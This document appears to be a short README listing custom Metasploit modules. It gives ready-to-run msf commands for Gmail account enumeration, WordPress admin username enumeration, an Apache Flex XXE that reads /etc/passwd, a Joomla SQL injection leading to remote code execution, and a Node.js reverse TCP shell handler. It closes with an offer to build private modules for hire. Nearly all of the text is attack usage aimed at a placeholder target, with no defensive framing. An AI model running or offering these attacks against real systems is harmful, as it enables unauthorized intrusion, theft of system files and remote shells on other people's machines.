Some modules that I created for fun. =]
Enumerate user of gmail.
msf> use auxiliary/gather/gmail_checker
msf> set check_email
msf> run
Enumerate adminnistrations users.
msf> use auxiliary/gather/wordpress_enumerating_username
msf> set rhost <target>
msf> exploit
RCE in Google Drive plugin for wordpress .
Path Transversal WP with Spritz for wordpress .
XXE Injection in Apache Flex
msf> use auxiliary/http/apacheflex_xxe
msf> set rhost <target>
msf> set rport <target>
msf> set file </etc/passwd>
msf> exploit
SQL Injection in Joomla
msf> use exploits/unix/webapp>joomla_comfields_sqli_rce
msf> set rhost <target>
msf> set rport <target>
msf> exploit
Reverse TCP using Node JS
msf> use exploits/multi/handler
msf> set payload cmd/unix/reverse_nodejs
msf> set rhost <ip>
msf> set rport <port>
msf> exploit
I do private jobs (private modules . . .), if you are interesting send me an e-mail at: